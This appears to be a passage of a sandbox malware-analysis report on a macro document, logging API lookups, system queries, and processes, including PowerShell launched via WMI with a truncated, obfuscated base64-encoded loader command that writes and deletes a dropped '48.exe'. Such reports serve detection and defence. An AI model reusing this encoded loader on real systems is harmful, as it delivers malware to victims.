Get Address c:\windows\system32\oleaut32.dll function = SysFreeString, address_out = 0x7fefd481320 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = LoadTypeLib, address_out = 0x7fefd48f1e0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = RegisterTypeLib, address_out = 0x7fefd4dcaa0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = QueryPathOfRegTypeLib, address_out = 0x7fefd511760 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = UnRegisterTypeLib, address_out = 0x7fefd5120d0 True 2
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleTranslateColor, address_out = 0x7fefd4ac760 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleCreateFontIndirect, address_out = 0x7fefd4decd0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleCreatePictureIndirect, address_out = 0x7fefd4de840 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleLoadPicture, address_out = 0x7fefd4ef420 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleCreatePropertyFrameIndirect, address_out = 0x7fefd4e4ec0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleCreatePropertyFrame, address_out = 0x7fefd4e9350 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleIconToCursor, address_out = 0x7fefd4b6e40 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = LoadTypeLibEx, address_out = 0x7fefd48a550 True 2
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleLoadPictureEx, address_out = 0x7fefd4ef320 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetSystemMetrics, address_out = 0x76f594f0 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromWindow, address_out = 0x76f55f08 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromRect, address_out = 0x76f52b00 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromPoint, address_out = 0x76f4ab64 True 1
Fn
Get Address c:\windows\system32\user32.dll function = EnumDisplayMonitors, address_out = 0x76f55c30 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetMonitorInfoA, address_out = 0x76f4a730 True 1
Fn
Get Address c:\windows\system32\user32.dll function = EnumDisplayDevicesA, address_out = 0x76f4a5b4 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = DispCallFunc, address_out = 0x7fefd482270 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = CreateTypeLib2, address_out = 0x7fefd50dbd0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDateFromUdate, address_out = 0x7fefd485c90 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarUdateFromDate, address_out = 0x7fefd486330 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = GetAltMonthNames, address_out = 0x7fefd4a66c0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarNumFromParseNum, address_out = 0x7fefd484710 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarParseNumFromStr, address_out = 0x7fefd4848f0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecFromR4, address_out = 0x7fefd4bb640 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecFromR8, address_out = 0x7fefd4bb360 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecFromDate, address_out = 0x7fefd4c2640 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecFromI4, address_out = 0x7fefd4a58a0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecFromCy, address_out = 0x7fefd4a5820 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarR4FromDec, address_out = 0x7fefd4baf20 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = GetRecordInfoFromTypeInfo, address_out = 0x7fefd4da0c0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = GetRecordInfoFromGuids, address_out = 0x7fefd512160 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArrayGetRecordInfo, address_out = 0x7fefd4a5af0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArraySetRecordInfo, address_out = 0x7fefd4a5a90 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArrayGetIID, address_out = 0x7fefd4a5a60 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArraySetIID, address_out = 0x7fefd4a5a30 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArrayCopyData, address_out = 0x7fefd4860b0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArrayAllocDescriptorEx, address_out = 0x7fefd483e90 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArrayCreateEx, address_out = 0x7fefd4d9f80 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFormat, address_out = 0x7fefd509b20 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFormatDateTime, address_out = 0x7fefd509aa0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFormatNumber, address_out = 0x7fefd509990 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFormatPercent, address_out = 0x7fefd509890 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFormatCurrency, address_out = 0x7fefd509770 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarWeekdayName, address_out = 0x7fefd4eb8d0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarMonthName, address_out = 0x7fefd4eb800 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarAdd, address_out = 0x7fefd5048e0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarAnd, address_out = 0x7fefd509470 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarCat, address_out = 0x7fefd5096a0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDiv, address_out = 0x7fefd502fe0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarEqv, address_out = 0x7fefd509cf0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarIdiv, address_out = 0x7fefd508ff0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarImp, address_out = 0x7fefd509c00 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarMod, address_out = 0x7fefd508e60 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarMul, address_out = 0x7fefd503690 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarOr, address_out = 0x7fefd5092d0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarPow, address_out = 0x7fefd502e80 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarSub, address_out = 0x7fefd503f90 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarXor, address_out = 0x7fefd5091a0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarAbs, address_out = 0x7fefd4e7c30 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFix, address_out = 0x7fefd4e7a60 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarInt, address_out = 0x7fefd4e7890 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarNeg, address_out = 0x7fefd4e7ea0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarNot, address_out = 0x7fefd509600 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarRound, address_out = 0x7fefd4e76a0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarCmp, address_out = 0x7fefd5083f0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecAdd, address_out = 0x7fefd4b3070 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecCmp, address_out = 0x7fefd4bd700 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarBstrCat, address_out = 0x7fefd4bd890 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarCyMulI4, address_out = 0x7fefd49caf0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarBstrCmp, address_out = 0x7fefd4a8a00 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll address_out = 0x7fee2cefcd0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll function = 573, address_out = 0x7fee38eafec True 3
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll function = 575, address_out = 0x7fee38eb100 True 3
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll function = 584, address_out = 0x7fee3a93440 True 3
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll function = 614, address_out = 0x7fee3a93304 True 3
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll function = 626, address_out = 0x7fee3ac2a80 True 3
Fn
Get Address c:\windows\system32\advapi32.dll function = DuplicateTokenEx, address_out = 0x7fefd71d310 True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = ThunderMain, wndproc_parameter = 0 True 1
Fn
System (31)
»
Operation Additional Information Success Count Logfile
Get Cursor x_out = 1328, y_out = 694 True 2
Fn
Get Cursor x_out = 630, y_out = 293 True 1
Fn
Get Time type = System Time, time = 2019-04-14 14:37:00 (UTC) True 1
Fn
Get Time type = Ticks, time = 129995 True 1
Fn
Get Time type = Performance Ctr, time = 18447153159 True 1
Fn
Get Time type = Local Time, time = 2019-04-14 14:37:04 (Local Time) True 4
Fn
Get Time type = Local Time, time = 2019-04-14 14:37:05 (Local Time) True 12
Fn
Get Time type = System Time, time = 2019-04-14 14:37:07 (UTC) True 1
Fn
Get Time type = Ticks, time = 136547 True 1
Fn
Get Time type = Performance Ctr, time = 19480767813 True 1
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Operating System True 3
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = DDRYBUR False 1
Fn
Process #2: svchost.exe
0 0
»
Information Value
ID #2
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:02, Reason: RPC Server
Unmonitor End Time: 00:04:56, Reason: Terminated by Timeout
Monitor Duration 00:03:54
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x370
Parent PID 0x1cc (c:\windows\system32\services.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x A4C
0x A48
0x A40
0x A3C
0x A38
0x A34
0x A30
0x A2C
0x A28
0x A10
0x 5C8
0x 414
0x 230
0x 408
0x 7DC
0x 798
0x 794
0x 764
0x 760
0x 758
0x 730
0x 728
0x 724
0x 71C
0x 70C
0x 700
0x 6FC
0x 6F8
0x 6E4
0x 4C0
0x 480
0x 474
0x 470
0x 450
0x 444
0x 294
0x 218
0x 3FC
0x 3F4
0x 3E8
0x 39C
0x 390
0x 38C
0x 388
0x 37C
0x 374
0x AC4
0x AD0
0x AD4
0x AD8
0x B00
0x B5C
0x B88
0x B8C
0x BBC
0x BC0
0x BC4
0x BC8
0x BCC
0x BD0
0x BD4
0x BD8
0x BEC
0x 80C
0x 894
0x 330
0x 70C
0x 71C
0x 77C
0x B38
0x 310
0x 60C
0x 4B4
0x 6A8
0x BC8
0x BC4
Process #4: wmiprvse.exe
0 0
»
Information Value
ID #4
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:10, Reason: RPC Server
Unmonitor End Time: 00:04:15, Reason: Self Terminated
Monitor Duration 00:03:04
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xadc
Parent PID 0x254 (c:\windows\system32\svchost.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x AE0
0x AE4
0x AE8
0x AEC
0x AF0
0x AF4
0x AF8
0x AFC
0x 500
0x 5BC
0x 5C8
Process #5: powershell.exe
742 17
»
Information Value
ID #5
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line Truncated command line: powershell -e KAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIAAgAGkATwAuAHMAVABSAEUAYQBNAFIAZQBhAGQAZQBSACgAKAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIABJAE8ALgBjAG8AbQBwAHIARQBTAHMAaQBPAE4ALgBEAEUAZgBsAGEAVABFAHMAdAByAGUAYQBNACgAIABbAGkAbwAuAG0ARQBNAG8AUgBZAFMAdAByAGUAYQBNAF0AIABbAEMAbwBuAFYAZQByAFQAXQA6ADoAZgBSAE8ATQBCAEEAcwBlADYANABzAFQAcgBJAE4AZwAoACgAJwBYAFoASgBSAGIANQBzACcAKwAnAHcAJwArACcARQAnACsAJwBNAGUALwAnACsAJwBDAGcAJwArACcAOQBJAFQAcABRAEIAaQA4AFIARABWACcAKwAnADQAJwArACcAVABVAGMAMQBoAFEAWAAnACsAJwByAGEAaABGACcAKwAnAFEAVwBoACcAKwAnAFMAaABWAHgARABuACcAKwAnAEMAZwBOACcAKwAnAHMAJwArACcASQBPACcAKwAnAHoAaAAnACsAJwBUAGwAdQAnACsAJwA4AC8AWgAyAGsAYQB0ACcAKwAnAEgANgAnACsAJwAzAGYALwBjAC8AMwBPACcAKwAnADcAJwArACcAdgAnACsAJwBWAGMAJwArACcANQBkAEIAJwArACcAQQBtACcAKwAnAEYATQB1ACcAKwAnAGkAVgBBAGIAcQBBAGoAawAnACsAJwBUAHQAJw...
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:11, Reason: Child Process
Unmonitor End Time: 00:01:38, Reason: Self Terminated
Monitor Duration 00:00:26
OS Process Information
»
Information Value
PID 0xb08
Parent PID 0xadc (c:\windows\system32\wbem\wmiprvse.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B0C
0x B4C
0x B50
0x B58
0x B6C
0x B70
0x B90
0x B94
0x B98
0x B9C
0x 114
0x 880
Host Behavior
File (246)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\48.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\48.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 4
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 3
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 3
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 5
Fn
Get Info - type = file_type True 3
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 1
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Windows\system32 type = file_attributes True 7
Fn
Get Info C:\Windows type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Users\aETAdzjz\48.exe type = file_type True 2
Fn
Get Info C:\Users\aETAdzjz\48.exe type = file_type True 8
Fn
Get Info C:\Users\aETAdzjz\48.exe type = file_attributes True 2
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 44
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 2
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 11
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 2
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 67
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 3
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read - size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 5
Fn
Data
Write C:\Users\aETAdzjz\48.exe size = 1492 True 1
Fn
Data
Delete C:\Users\aETAdzjz\48.exe - True 4
Fn
Registry (211)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 6
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
